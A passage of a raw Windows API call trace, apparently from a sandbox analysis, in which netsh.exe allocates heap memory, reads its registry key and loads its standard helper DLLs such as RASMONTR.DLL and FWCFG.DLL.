() returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f60 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f80 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1fa0 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1fc0 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1fe0 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2000 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2020 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) 
returned 0x2e2040 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2060 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e20c0 [0117.143] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e20e0 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2100 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2120 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2140 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2160 [0117.144] GetProcessHeap () returned 0x2c0000 [0117.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2180 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e21a0 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e21c0 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e21e0 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2200 [0117.145] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2220 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2240 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2260 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2280 [0117.146] GetProcessHeap () returned 0x2c0000 [0117.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e22a0 [0117.147] GetProcessHeap () returned 0x2c0000 [0117.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e22c0 [0117.147] GetProcessHeap () returned 0x2c0000 [0117.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e22e0 [0117.147] GetProcessHeap () returned 0x2c0000 [0117.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e2300 [0117.148] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0117.148] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0117.148] GetProcessHeap () returned 0x2c0000 [0117.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2de060 [0117.148] GetProcessHeap () returned 0x2c0000 [0117.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x2e2890 [0117.149] GetProcessHeap () returned 0x2c0000 [0117.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2e2320 [0117.149] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0117.149] GetProcessHeap () returned 0x2c0000 [0117.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0117.150] GetProcessHeap () returned 0x2c0000 [0117.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x2e28b0 [0117.150] GetProcessHeap () returned 0x2c0000 [0117.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0117.151] GetProcessHeap () returned 0x2c0000 [0117.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x2e2910 [0117.205] GetProcessHeap () returned 
0x2c0000 [0117.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e28b0 | out: hHeap=0x2c0000) returned 1 [0117.206] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x1474a8 | out: phkResult=0x1474a8*=0x90) returned 0x0 [0117.206] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1474d0, lpcbMaxValueNameLen=0x1474e0, lpcbMaxValueLen=0x1474d8, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1474d0*=0x15, lpcbMaxValueNameLen=0x1474e0, lpcbMaxValueLen=0x1474d8, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0117.206] GetProcessHeap () returned 0x2c0000 [0117.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x16) returned 0x2e2340 [0117.207] GetProcessHeap () returned 0x2c0000 [0117.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x23) returned 0x2de090 [0117.207] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="4", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0117.207] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0117.207] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0117.207] GetProcessHeap () returned 0x2c0000 [0117.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2e28b0 [0117.208] GetProcessHeap () returned 0x2c0000 [0117.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x2e29d0 [0117.208] GetProcessHeap () returned 0x2c0000 [0117.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x2de0c0 [0117.208] _wcsupr (in: _String="rasmontr.dll" | out: 
_String="RASMONTR.DLL") returned="RASMONTR.DLL" [0117.209] GetProcessHeap () returned 0x2c0000 [0117.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de060 | out: hHeap=0x2c0000) returned 1 [0117.209] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fefbc80000 [0132.924] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x146ea0 | out: lpSystemTimeAsFileTime=0x146ea0*(dwLowDateTime=0x3223cd80, dwHighDateTime=0x1d5f7c9)) [0132.924] GetCurrentProcessId () returned 0x4fc [0132.924] GetCurrentThreadId () returned 0x570 [0132.924] GetTickCount () returned 0x114c5ee [0132.924] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x146ea8 | out: lpPerformanceCount=0x146ea8*=23894766598) returned 1 [0133.135] LoadLibraryA (lpLibFileName="MSVCRT.DLL") returned 0x7fefdee0000 [0133.145] GetVersion () returned 0x1db10106 [0133.145] SetErrorMode (uMode=0x0) returned 0x0 [0133.146] SetErrorMode (uMode=0x8001) returned 0x0 [0133.200] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x2e4360 [0133.201] LocalFree (hMem=0x2e4360) returned 0x0 [0133.201] GetVersion () returned 0x1db10106 [0133.250] GlobalLock (hMem=0xb80008) returned 0x2e4360 [0133.313] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x2e4580 [0133.314] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2e3080 [0133.314] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2e2360 [0133.315] malloc (_Size=0x100) returned 0x277c80 [0133.315] __dllonexit () returned 0x7fef443621c [0133.315] __dllonexit () returned 0x7fef44366e0 [0133.577] __dllonexit () returned 0x7fef44372b8 [0133.599] __dllonexit () returned 0x7fef44387cc [0133.599] __dllonexit () returned 0x7fef4438d64 [0133.599] __dllonexit () returned 0x7fef4438db4 [0133.600] __dllonexit () returned 0x7fef4438e70 [0133.600] __dllonexit () returned 0x7fef443a308 [0133.601] __dllonexit () returned 0x7fef4438810 [0133.628] __dllonexit () returned 0x7fef4447598 [0133.628] __dllonexit () returned 0x7fef4438880 [0133.629] __dllonexit () returned 0x7fef443a170 
[0133.629] __dllonexit () returned 0x7fef443a280 [0133.630] __dllonexit () returned 0x7fef443ad44 [0133.630] __dllonexit () returned 0x7fef443bc30 [0133.630] __dllonexit () returned 0x7fef443bc80 [0133.631] __dllonexit () returned 0x7fef443c338 [0133.631] __dllonexit () returned 0x7fef443d030 [0133.631] __dllonexit () returned 0x7fef44359cc [0133.631] __dllonexit () returned 0x7fef44359f0 [0133.632] __dllonexit () returned 0x7fef4435a1c [0133.640] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0135.719] __dllonexit () returned 0x7fef4447568 [0135.720] __dllonexit () returned 0x7fef4447574 [0135.720] __dllonexit () returned 0x7fef4447580 [0135.721] __dllonexit () returned 0x7fef444758c [0135.721] GetVersion () returned 0x1db10106 [0135.721] GetVersion () returned 0x1db10106 [0135.722] GetVersion () returned 0x1db10106 [0135.722] __dllonexit () returned 0x7fef439a15c [0135.723] __dllonexit () returned 0x7fef43a6610 [0135.723] __dllonexit () returned 0x7fef4438910 [0135.723] __dllonexit () returned 0x7fef4438b90 [0135.724] __dllonexit () returned 0x7fef4438bb4 [0135.724] __dllonexit () returned 0x7fef43b6ae0 [0135.730] GetVersion () returned 0x1db10106 [0135.731] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0135.955] GetSystemMetrics (nIndex=11) returned 32 [0135.955] GetSystemMetrics (nIndex=12) returned 32 [0135.956] GetSystemMetrics (nIndex=2) returned 17 [0135.956] GetSystemMetrics (nIndex=3) returned 17 [0135.956] GetDC (hWnd=0x0) returned 0x90109ef [0135.957] GetDeviceCaps (hdc=0x90109ef, index=88) returned 96 [0135.957] GetDeviceCaps (hdc=0x90109ef, index=90) returned 96 [0135.957] ReleaseDC (hWnd=0x0, hDC=0x90109ef) returned 1 [0135.957] GetSysColor (nIndex=15) returned 0xf0f0f0 [0135.957] GetSysColor (nIndex=16) returned 0xa0a0a0 [0135.957] GetSysColor (nIndex=20) returned 0xffffff [0135.957] GetSysColor (nIndex=18) returned 0x0 [0135.957] GetSysColor (nIndex=6) returned 0x646464 [0135.958] GetSysColorBrush (nIndex=15) 
returned 0x1100059 [0135.958] GetSysColorBrush (nIndex=6) returned 0x1100061 [0135.958] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0135.958] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0135.959] __dllonexit () returned 0x7fef4438f84 [0135.959] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0136.290] __dllonexit () returned 0x7fef43c3990 [0136.290] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0136.509] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0136.509] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0136.509] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0136.509] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0136.510] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0136.510] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0136.510] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0136.512] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0136.512] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0136.512] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0136.513] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0136.514] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0136.515] __dllonexit () returned 0x7fef44475a4 [0136.515] __dllonexit () returned 0x7fef44475bc [0136.517] __dllonexit () returned 0x7fef44475c8 [0136.518] __dllonexit () returned 0x7fef44475d4 [0136.519] __dllonexit () returned 0x7fef44475e0 [0136.520] GetCursorPos (in: lpPoint=0x7fef44a26d8 | out: lpPoint=0x7fef44a26d8*(x=1256, y=516)) returned 1 [0136.521] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2e48d0 [0136.521] LocalReAlloc (hMem=0x2e2360, uBytes=0x18, uFlags=0x2) returned 0x2e49e0 [0136.522] 
GetCurrentThread () returned 0xfffffffffffffffe [0136.522] GetCurrentThreadId () returned 0x570 [0136.522] __dllonexit () returned 0x7fef443cfa4 [0136.523] SetErrorMode (uMode=0x0) returned 0x8001 [0136.523] SetErrorMode (uMode=0x8001) returned 0x0 [0136.525] GetModuleFileNameW (in: hModule=0x7fef4380000, lpFilename=0x146590, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0136.525] wcscpy_s (in: _Destination=0x1467a0, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0136.558] FindResourceW (hModule=0x7fef4380000, lpName=0xe01, lpType=0x6) returned 0x2409b0 [0137.215] LoadStringW (in: hInstance=0x7fef4380000, uID=0xe000, lpBuffer=0x1469b0, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0137.216] wcscpy_s (in: _Destination=0x1465c4, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0137.216] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0137.532] malloc (_Size=0x80) returned 0x277e90 [0137.533] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x2e4a00 [0137.534] GetSystemDirectoryA (in: lpBuffer=0x146c30, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0137.534] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0137.534] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0137.535] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0137.535] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0138.139] GetProcAddress (hModule=0x7fefbc80000, 
lpProcName="InitHelperDll") returned 0x7fefbc9cf70 [0138.139] InitHelperDll () returned 0x0 [0138.141] RegisterHelper () returned 0x0 [0138.141] GetProcessHeap () returned 0x2c0000 [0138.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2e6b10 [0138.141] GetProcessHeap () returned 0x2c0000 [0138.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2910 | out: hHeap=0x2c0000) returned 1 [0138.384] RegisterHelper () returned 0x0 [0138.384] GetProcessHeap () returned 0x2c0000 [0138.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x160) returned 0x2e6c20 [0138.385] GetProcessHeap () returned 0x2c0000 [0138.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6b10 | out: hHeap=0x2c0000) returned 1 [0138.385] RegisterHelper () returned 0x0 [0138.385] GetProcessHeap () returned 0x2c0000 [0138.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1b8) returned 0x2e6d90 [0138.386] GetProcessHeap () returned 0x2c0000 [0138.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6c20 | out: hHeap=0x2c0000) returned 1 [0138.386] RegisterHelper () returned 0x0 [0138.386] GetProcessHeap () returned 0x2c0000 [0138.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2e6b10 [0138.386] GetProcessHeap () returned 0x2c0000 [0138.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6d90 | out: hHeap=0x2c0000) returned 1 [0138.387] RegisterHelper () returned 0x0 [0138.387] GetProcessHeap () returned 0x2c0000 [0138.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x268) returned 0x2e6d30 [0138.387] GetProcessHeap () returned 0x2c0000 [0138.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6b10 | out: hHeap=0x2c0000) returned 1 [0138.388] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="nshwfp", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, 
lpcbData=0x1474e8) returned 0x0 [0138.388] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0138.388] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0138.388] GetProcessHeap () returned 0x2c0000 [0138.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x78) returned 0x2e2910 [0138.389] GetProcessHeap () returned 0x2c0000 [0138.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe) returned 0x2e2360 [0138.389] GetProcessHeap () returned 0x2c0000 [0138.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16) returned 0x2e2380 [0138.389] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0138.389] GetProcessHeap () returned 0x2c0000 [0138.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e28b0 | out: hHeap=0x2c0000) returned 1 [0138.390] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef3720000 [0143.980] GetProcAddress (hModule=0x7fef3720000, lpProcName="InitHelperDll") returned 0x7fef378b6d0 [0143.980] InitHelperDll () returned 0x0 [0143.983] RegisterHelper () returned 0x0 [0143.983] GetProcessHeap () returned 0x2c0000 [0143.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c0) returned 0x2f0ed0 [0143.984] GetProcessHeap () returned 0x2c0000 [0143.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6d30 | out: hHeap=0x2c0000) returned 1 [0143.984] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="dhcpclient", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0143.985] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0143.985] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0143.985] GetProcessHeap () returned 0x2c0000 [0143.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x2e6d30 [0143.986] 
GetProcessHeap () returned 0x2c0000 [0143.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16) returned 0x2e23a0 [0143.986] GetProcessHeap () returned 0x2c0000 [0143.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x22) returned 0x2e7360 [0143.986] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0143.986] GetProcessHeap () returned 0x2c0000 [0143.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2910 | out: hHeap=0x2c0000) returned 1 [0143.986] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef4d70000 [0150.618] GetProcAddress (hModule=0x7fef4d70000, lpProcName="InitHelperDll") returned 0x7fef4d71a40 [0150.618] InitHelperDll () returned 0x0 [0150.618] RegisterHelper () returned 0x0 [0150.619] GetProcessHeap () returned 0x2c0000 [0150.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x318) returned 0x2f5e60 [0150.619] GetProcessHeap () returned 0x2c0000 [0150.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f0ed0 | out: hHeap=0x2c0000) returned 1 [0150.620] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="wshelper", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0150.620] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0150.620] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0150.620] GetProcessHeap () returned 0x2c0000 [0150.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc8) returned 0x2f0ed0 [0150.620] GetProcessHeap () returned 0x2c0000 [0150.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2f3610 [0150.621] GetProcessHeap () returned 0x2c0000 [0150.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x2f1620 [0150.621] _wcsupr (in: _String="wshelper.dll" | out: 
_String="WSHELPER.DLL") returned="WSHELPER.DLL" [0150.621] GetProcessHeap () returned 0x2c0000 [0150.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6d30 | out: hHeap=0x2c0000) returned 1 [0150.621] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef4370000 [0156.089] GetProcAddress (hModule=0x7fef4370000, lpProcName="InitHelperDll") returned 0x7fef4371720 [0156.089] InitHelperDll () returned 0x0 [0156.108] RegisterHelper () returned 0x0 [0156.108] GetProcessHeap () returned 0x2c0000 [0156.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x370) returned 0x2f6bd0 [0156.108] GetProcessHeap () returned 0x2c0000 [0156.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5e60 | out: hHeap=0x2c0000) returned 1 [0156.108] RegEnumValueW (in: hKey=0x90, dwIndex=0x4, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="nshhttp", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0156.109] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0156.109] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0156.109] GetProcessHeap () returned 0x2c0000 [0156.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x2f5e60 [0156.109] GetProcessHeap () returned 0x2c0000 [0156.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2f3630 [0156.109] GetProcessHeap () returned 0x2c0000 [0156.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2f3650 [0156.109] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0156.109] GetProcessHeap () returned 0x2c0000 [0156.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f0ed0 | out: hHeap=0x2c0000) returned 1 [0156.110] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x7fefb970000 [0158.801] GetProcAddress (hModule=0x7fefb970000, 
lpProcName="InitHelperDll") returned 0x7fefb971c24 [0158.801] InitHelperDll () returned 0x0 [0158.801] RegisterHelper () returned 0x0 [0158.801] GetProcessHeap () returned 0x2c0000 [0158.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3c8) returned 0x2f6f50 [0158.802] GetProcessHeap () returned 0x2c0000 [0158.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6bd0 | out: hHeap=0x2c0000) returned 1 [0158.802] RegEnumValueW (in: hKey=0x90, dwIndex=0x5, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="fwcfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0158.802] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0158.802] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0158.803] GetProcessHeap () returned 0x2c0000 [0158.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x118) returned 0x2f5f60 [0158.803] GetProcessHeap () returned 0x2c0000 [0158.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2f3670 [0158.803] GetProcessHeap () returned 0x2c0000 [0158.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2f3690 [0158.803] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0158.803] GetProcessHeap () returned 0x2c0000 [0158.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5e60 | out: hHeap=0x2c0000) returned 1 [0158.804] LoadLibraryW (lpLibFileName="FWCFG.DLL") returned 0x7fef4350000 [0161.511] GetProcAddress (hModule=0x7fef4350000, lpProcName="InitHelperDll") returned 0x7fef4352d20 [0161.511] InitHelperDll () returned 0x0 [0161.511] RegisterHelper () returned 0x0 [0161.511] GetProcessHeap () returned 0x2c0000 [0161.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x420) returned 0x2fb320 [0161.511] GetProcessHeap () returned 0x2c0000 [0161.512] HeapFree (in: hHeap=0x2c0000, 
